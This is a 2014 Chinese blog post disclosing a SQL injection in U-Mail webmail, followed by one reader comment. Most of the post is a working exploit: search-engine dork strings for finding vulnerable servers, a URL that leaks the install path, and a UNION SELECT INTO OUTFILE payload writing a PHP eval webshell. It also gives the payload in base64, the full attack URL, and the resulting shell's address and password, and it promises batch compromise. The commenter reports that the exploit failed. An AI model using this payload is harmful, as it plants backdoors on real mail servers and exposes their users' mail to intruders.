U-Mail注入之任意代码写入

u-mail中某个文件由于参数过滤不严谨导致产生了SQL注入,通过此漏洞可以将shell写入到web目录下,可批量getshell。

Baidu & Google Keywords:
————————————————————-
Power by U-Mail *
精准反垃圾,有效过滤超过98.6%的垃圾邮件 *
病毒邮件有效拦截率超过99.9%; *
*
等等…自由构造! *
————————————————————-
漏洞利用:
要想写入shell必须知道其物理路径对吧,可通过此方法获取物理路径,当然这只是鸡肋爆路径,大家还可以继续研究:
http://xxx.com/webmail/userapply.php?execadd=333&DomainID=111

171120pzpl8qllillg209w
得到物理路径:E:umailWorldClienthtmluserapply.php

注入webshell代码:

aa' union select 1,2,3,4,5,6,'<!--?php eval($_POST);?-->',8,9,10,11,12,13,14 into outfile 'E:/umail/WorldClient/html/08sec.php'#

将其base64加密一下,记得路径是“/”,而不是””

得到:

YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1Rbc2hlbGxdKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRTovdW1haWwvV29ybGRDbGllbnQvaHRtbC8wOHNlYy5waHAnIw==

然后访问…..

http://xxx.com/webmail/fileshare.php?file=YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1Rbc2hlbGxdKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRTovdW1haWwvV29ybGRDbGllbnQvaHRtbC8wOHNlYy5waHAnIw==

171257cj011ijh10x55h1i
就将shell写进了web目录中,shell地址:http://xxx.com/webmail/08sec.php password:shell

20140112195921
声明:漏洞仅供研究,请勿用于非法用途,否则后果自负

本文固定链接: https://www.unhonker.com/bug/1513.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2014年01月12日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: U-Mail注入之任意代码写入 | 90' s Blog|关注网络信息安全
关键字:

U-Mail注入之任意代码写入:目前有1 条留言

  1. 沙发
    mylovechina:

    测试了好几次,貌似都没成功。乌云上还处于漏洞未公开状态,理论上应该是可以的。 执行到最后一步,提示:无此共享文件。但是发现并没有写入shell

    2014-02-04 17:20

发表评论

您必须 [ 登录 ] 才能发表留言!